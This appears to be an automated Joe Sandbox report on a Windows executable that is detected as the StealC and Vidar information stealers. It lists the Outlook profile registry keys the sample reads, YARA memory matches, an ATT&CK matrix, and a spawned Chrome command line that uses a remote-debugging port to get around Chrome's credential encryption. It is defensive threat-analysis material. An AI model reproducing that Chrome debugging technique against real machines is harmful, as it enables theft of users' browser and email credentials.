Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2003720246.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1678322710.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C670C40 sqlite3_bind_zeroblob,	0_2_6C670C40
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C670D60 sqlite3_bind_parameter_name,	0_2_6C670D60
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C598EA0 sqlite3_clear_bindings,	0_2_6C598EA0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C670B40
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C596410 bind,WSAGetLastError,	0_2_6C596410
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C59C050
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C596070 PR_Listen,	0_2_6C596070
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C59C030 sqlite3_bind_parameter_count,	0_2_6C59C030
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5960B0 listen,WSAGetLastError,	0_2_6C5960B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5222D0 sqlite3_bind_blob,	0_2_6C5222D0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5963C0 PR_Bind,	0_2_6C5963C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	23 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Disable or Modify Tools	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	12 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	236 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Extra Window Memory Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0vsAIy0DhJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
0vsAIy0DhJ.exe